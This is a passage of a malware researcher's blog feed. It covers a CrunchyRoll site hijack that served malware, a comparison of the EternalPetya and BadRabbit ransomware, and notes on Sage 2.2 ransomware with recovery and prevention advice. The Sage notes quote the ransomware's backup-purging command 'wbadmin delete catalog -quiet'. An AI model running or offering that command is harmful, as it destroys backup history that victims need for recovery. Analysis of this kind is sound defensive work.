<li>If a website you visit frequently suddenly looks completely different, or urges you to download whatever, be safe rather than sorry, and leave the website.</li>
<li>Additionally, try to Google or use social media to verify if anyone else is experiencing the same issue.</li>
</ul>
<div>
In this particular case or incident, you may also want to block the two IP addresses as described in this blog post, by adding them in your firewall.</div>
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
This hack shows that any website or organisation is, in theory, vulnerable to someone hijacking the website, and consequently download and install malware on a user's machine.<br />
<br />
While it is uncertain what exactly happened, CrunchyRoll took correct action by taking the website down not too long after. At this point, it is best to monitor their Twitter account, and/or wait for an official statement.<br />
<br />
If you have not executed the file, you should be safe. Simply delete the downloaded file.<br />
<i><br /></i>
<strike><i>Note </i>that I can't speak for any second-stage payload that may have been downloaded in the early stage of the attack - however; when I investigated shortly after, I didn't observe any secondary malware.</strike><br />
<br />
<b><span style="color: orange;">Update</span></b>: the second-stage payload was the default Meterpreter by Metasploit. Updated analysis above. This does not affect or change the disinfection or removal steps.<br />
<br />
Follow the prevention tips above to stay secure. Any questions or feedback? Feel free to leave a <a href="https://bartblaze.blogspot.co.uk/2017/11/crunchyroll-hack-delivers-malware.html#comments">comment</a>, or reach out to me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<br />
<b>IOCs</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/59fdd95069fa71758e3cd6f7.js"></script>
<b><br /></b>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com18tag:blogger.com,1999:blog-606282676955748155.post-21552850763106964412017-10-25T21:06:00.001+02:002017-11-01T10:35:10.580+01:00Comparing EternalPetya and BadRabbit<br />
I've created a table comparing the EternalPetya (ExPetr, NotPetya, etc.) outbreak from June, and the BadRabbit ransomware outbreak from yesterday (2017-10-24).<br />
<br />
I have decided to not include <a href="https://bartblaze.blogspot.co.uk/2017/05/wannacry-frequently-asked-questions.html" target="_blank">WannaCry</a> (WanaCrypt0r), as they are not related, while EternalPetya and BadRabbit do seem very closely related, or even developed by (a part of) the same people.<br />
<br />
Use freely, as long as you include a link to the original <a href="https://bartblaze.blogspot.com/2017/10/comparing-eternalpetya-and-badrabbit.html">source</a>, which is this blog post.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir87fqildvAn0IqVRHz6YcleSva3zpyVYHQjbw-TwD6JyysKra3bqKzVIxrdI9ZKtPMfnRTTiQiaqBWa5X3MJ4kkM8RIyyuj_cVdYrzSYEt3lbDRvouy7YAhzal7eFtivpwpXK7t_QwwHc/s1600/EP-BR-comparison.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="782" data-original-width="593" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir87fqildvAn0IqVRHz6YcleSva3zpyVYHQjbw-TwD6JyysKra3bqKzVIxrdI9ZKtPMfnRTTiQiaqBWa5X3MJ4kkM8RIyyuj_cVdYrzSYEt3lbDRvouy7YAhzal7eFtivpwpXK7t_QwwHc/s640/EP-BR-comparison.PNG" width="484" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Comparison table (click to enlarge)<br />
<div>
<br /></div>
</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<br />
<br />
<b><span style="font-size: large;">Download the table / comparison sheet</span></b><br />
<br />
Additionally, you may find this image as a handy spreadsheet (which you can also download in several formats) on Google Docs here:<br />
<a href="https://docs.google.com/spreadsheets/d/1RQvl8Yl08Xz1DBbA4D-wNcS7qZQvnU4VYqP7OI4s_qE" target="_blank">EternalPetya_BadRabbit_Comparison</a><br />
<br />
<i>Note</i>: this table or sheet will be updated continuously.<br />
<br />
<br />
<b><span style="font-size: large;">Purpose of BadRabbit?</span></b><br />
<br />
Again, this makes you wonder about the actual purpose of ransomware, which you can read more about here: <a href="https://bartblaze.blogspot.com/p/the-purpose-of-ransomware.html" target="_blank">The purpose of ransomware</a><br />
<br />
For BadRabbit in particular, it may be deployed as a cover-up or smokescreen, or for both disruption <i>and </i>extortion.<br />
<br />
<br />
<b><span style="font-size: large;">Prevention </span></b><br />
<br />
As for any prevention advise, have a look at the following page I've set up:<br />
<a href="https://bartblaze.blogspot.com/p/ransomware-prevention.html" target="_blank">Ransomware prevention</a><br />
<br />
<b><span style="font-size: large;"><br /></span></b>
<b><span style="font-size: large;">Disinfection and decryption</span></b><br />
<br />
Unfortunately, decryption is likely not possible without the cybercriminal's private key.<br />
<br />
You <i>may</i> be able to restore the MBR, or your files, if you catch the ransomware in the act, and shutdown the machine at that point. <a href="https://www.howtogeek.com/107511/how-to-boot-into-safe-mode-on-windows-8-the-easy-way/" target="_blank">Reboot in safe mode</a> and copy over or <a href="https://www.howtogeek.com/242428/whats-the-best-way-to-back-up-my-computer/" target="_blank">back-up</a> your files.<br />
<br />
Then, <a href="https://www.howtogeek.com/howto/32523/how-to-manually-repair-windows-7-boot-loader-problems/" target="_blank">Restore the MBR</a>, and <a href="https://www.howtogeek.com/133254/beginner-geek-how-to-reinstall-windows-on-your-computer/" target="_blank">reinstall Windows</a>.<br />
<br />
You may also try to restore the MBR <i>first</i>, and consequently attempt to restore files using Shadow Volume Copies. For example, a tool such as <a href="http://www.shadowexplorer.com/" target="_blank">Shadow Explorer</a> can be of assistance, or read the tutorial <a href="https://www.bleepingcomputer.com/tutorials/how-to-recover-files-and-folders-using-shadow-volume-copies/" target="_blank">here</a>.<br />
<br />
If that doesn't work either, you may try using a data recovery program such as <a href="http://www.cgsecurity.org/wiki/PhotoRec" target="_blank">PhotoRec</a> or <a href="https://www.piriform.com/recuva" target="_blank">Recuva</a><br />
<br />
<br />
Any questions, comments or feedback, please do let me know in the comments section below, or send me a message on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>. See also my <a href="https://bartblaze.blogspot.co.uk/p/about.html" target="_blank">About me</a> page for other contact details.<br />
<br />
<br />
<br />Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-23776587219302514072017-10-14T19:50:00.001+02:002017-10-21T19:16:18.931+02:00Notes on Sage 2.2 ransomware version<br />
Sage, also known as SageCrypt, is an interesting ransomware variant - emerged somewhere in December last year, and is believed to be a variant of the CryLocker ransomware.<br />
<br />
There's a good <a href="https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/" target="_blank">blog post</a> on BleepingComputer on the first version of Sage, id est "Sage 2".<br />
<br />
Yesterday, a personal friend of mine reached out, as his "computer started talking" and his files appeared to be encrypted. And indeed, it appears he suffered the latest variant of Sage: Sage 2.2<br />
<br />
Sage 2.2 appears to have been out for a while, at least since February of this year:<br />
<br />
<blockquote class="twitter-tweet" data-cards="hidden" data-lang="en">
<div dir="ltr" lang="en">
Sage 2.2 sample (at 11/58): <a href="https://t.co/XsWMsPcXsj">https://t.co/XsWMsPcXsj</a><br />
From: nrcommerce[.]com/system/config/spam1.exe - that filename... 👏<br />
More samples: <a href="https://t.co/a2J157kjJk">pic.twitter.com/a2J157kjJk</a></div>
— MalwareHunterTeam (@malwrhunterteam) <a href="https://twitter.com/malwrhunterteam/status/834028153299410944?ref_src=twsrc%5Etfw">February 21, 2017</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script>
<br />
Some figures of Sage 2.2 follow below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-3rHRnr8-5l0/WeJI1gc8juI/AAAAAAAAB1U/3oefTRzUo2UU6bRlZKsI65McjszrNtJtgCLcBGAs/s1600/sage2_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="715" data-original-width="1143" height="250" src="https://3.bp.blogspot.com/-3rHRnr8-5l0/WeJI1gc8juI/AAAAAAAAB1U/3oefTRzUo2UU6bRlZKsI65McjszrNtJtgCLcBGAs/s400/sage2_2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Sage 2.2 desktop background</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-O8pt-NgimMA/WeJKQGcEa_I/AAAAAAAAB1c/R_wB6-Zn2D8F7h8Vq9W8p4a9JHq_KjV4ACLcBGAs/s1600/sage2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="864" data-original-width="1480" height="232" src="https://4.bp.blogspot.com/-O8pt-NgimMA/WeJKQGcEa_I/AAAAAAAAB1c/R_wB6-Zn2D8F7h8Vq9W8p4a9JHq_KjV4ACLcBGAs/s400/sage2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Sage 2.2 file recovery instructions</td></tr>
</tbody></table>
<br />
<div>
The message reads:<br />
<br />
<blockquote class="tr_bq">
<i>You probably noticed that you can not open your files and that some software stopped working correctly.<br />This is expected. Your files content is still there, but it was encrypted by "SAGE 2.2 Ransomware".<br />Your files are not lost, it is possible to revert them back to normal state by decrypting.<br />The only way you can do that is by getting "SAGE Decrypter" software and your personal decryption key.</i></blockquote>
<i><br /></i>Typical features of Sage 2.2, include, but are not limited to:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<ul>
<li>Refresh or update of payment pages is possible;</li>
<li>Ransom note (<i>!HELP_SOS</i>) and portal, including CAPTCHA;</li>
</ul>
And...<br />
<br />
It speaks! Just like Cerber did at some point, Sage 2.2 has a message for the victim using Microsoft SAPI:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://1.bp.blogspot.com/-gXgvDPU5i-Q/WeJLrknJR0I/AAAAAAAAB1o/LOp7TJAI4DwJl-ahgzP0At4IOQ1A3IfigCLcBGAs/s1600/voice.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="276" data-original-width="1600" height="67" src="https://1.bp.blogspot.com/-gXgvDPU5i-Q/WeJLrknJR0I/AAAAAAAAB1o/LOp7TJAI4DwJl-ahgzP0At4IOQ1A3IfigCLcBGAs/s400/voice.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption">Figure 3 - VBscript which will speak to the victim (click to enlarge)</td></tr>
</tbody></table>
<br />
Interestingly enough, even though the version number still indicates 2.2, there's at least one slight change:<br />
<ul>
<li>Deletion or purge of backup catalog/history by using:<br /><i style="font-weight: bold;">wbadmin delete catalog -quiet</i></li>
</ul>
<br />
The portal or decryption pages look as follows, stepping through:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-YK8dldOq8XM/WeJMR7xRxVI/AAAAAAAAB1w/jlh0zAgxgJwBV7JTVaXs-x_v4EZOQPtcQCLcBGAs/s1600/login.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="361" data-original-width="738" height="195" src="https://3.bp.blogspot.com/-YK8dldOq8XM/WeJMR7xRxVI/AAAAAAAAB1w/jlh0zAgxgJwBV7JTVaXs-x_v4EZOQPtcQCLcBGAs/s400/login.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Sage 2.2 user login portal</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-BDKKfuHr_3o/WeJMwprZMaI/AAAAAAAAB10/x9EppBX6wm4B9-DEVmBHtmhFEGBkD417wCLcBGAs/s1600/captchta.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="286" data-original-width="703" height="162" src="https://1.bp.blogspot.com/-BDKKfuHr_3o/WeJMwprZMaI/AAAAAAAAB10/x9EppBX6wm4B9-DEVmBHtmhFEGBkD417wCLcBGAs/s400/captchta.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Captcha<br />
<br /></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-7AfaePNgAXU/WeJNM5xOzCI/AAAAAAAAB14/bFQbVfSkABYiH9ohYQDk9E8iM1DDUT7lwCLcBGAs/s1600/lang.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="410" data-original-width="674" height="242" src="https://2.bp.blogspot.com/-7AfaePNgAXU/WeJNM5xOzCI/AAAAAAAAB14/bFQbVfSkABYiH9ohYQDk9E8iM1DDUT7lwCLcBGAs/s400/lang.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - Language selection<br />
<br /></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-VNOhrnG_gZk/WeJNM3BuzhI/AAAAAAAAB18/jxMtFZRgBgQnKjxZFhsWXN16Lqf4q-4zACLcBGAs/s1600/endportal.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="575" data-original-width="1600" height="143" src="https://1.bp.blogspot.com/-VNOhrnG_gZk/WeJNM3BuzhI/AAAAAAAAB18/jxMtFZRgBgQnKjxZFhsWXN16Lqf4q-4zACLcBGAs/s400/endportal.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 7 - Final portal</td></tr>
</tbody></table>
<br />
The victim can choose from a multitude of languages, and, at the final portal, there is a special price for the decryption, for a selected time (7 days): currently 0.17720 BTC, which is about $1000.<br />
<br />
As usual, there's a Payment, Test decryption, Instructions, and even a Support tab:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-qC2P5dI5sfM/WeJQKpiFA8I/AAAAAAAAB2I/mwN8unUtdXs93BD6lTcQ0Kt77vPnWwEXgCLcBGAs/s1600/payment.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="470" data-original-width="1156" height="162" src="https://3.bp.blogspot.com/-qC2P5dI5sfM/WeJQKpiFA8I/AAAAAAAAB2I/mwN8unUtdXs93BD6lTcQ0Kt77vPnWwEXgCLcBGAs/s400/payment.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8 - Payment tab</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-4nIdsSBkMN0/WeJQLOuWu8I/AAAAAAAAB2Q/d5KU1AuGvC473geQe9ryypeoQtcJYm_3gCLcBGAs/s1600/testdecr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="495" data-original-width="1157" height="170" src="https://4.bp.blogspot.com/-4nIdsSBkMN0/WeJQLOuWu8I/AAAAAAAAB2Q/d5KU1AuGvC473geQe9ryypeoQtcJYm_3gCLcBGAs/s400/testdecr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9 - Test Decryption tab</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ZL41737zQdk/WeJQKhzsCXI/AAAAAAAAB2M/TxJhn87-f2su1lvJU3eDZb4UCPRSZZgbACLcBGAs/s1600/instruc.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="423" data-original-width="1140" height="147" src="https://3.bp.blogspot.com/-ZL41737zQdk/WeJQKhzsCXI/AAAAAAAAB2M/TxJhn87-f2su1lvJU3eDZb4UCPRSZZgbACLcBGAs/s400/instruc.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 10 - Instructions tab</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-hqHfvVrizQU/WeJQKfadD8I/AAAAAAAAB2E/zH2YrApWeVo1UIdhQ5jcSfoROUKH1nSJgCLcBGAs/s1600/support.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="755" data-original-width="1154" height="261" src="https://1.bp.blogspot.com/-hqHfvVrizQU/WeJQKfadD8I/AAAAAAAAB2E/zH2YrApWeVo1UIdhQ5jcSfoROUKH1nSJgCLcBGAs/s400/support.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 11 - Support requests tab</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
Sage 2.2 will append the .sage extension to encrypted files and currently, it does not appear files can be decrypted without the cybercriminal's help.<br />
<br />
As always, try to restore from a backup if possible, and avoid paying the ransom.<br />
<br />
Additionally, have a look at my <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">ransomware prevention</a> page, on how to protect yourself.<br />
<br />
<br />
<br />
<b>IOCs</b><br />
<br />
<script src="https://otx.alienvault.com/pulse/59e24f68d774923bf414d431.js"></script>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0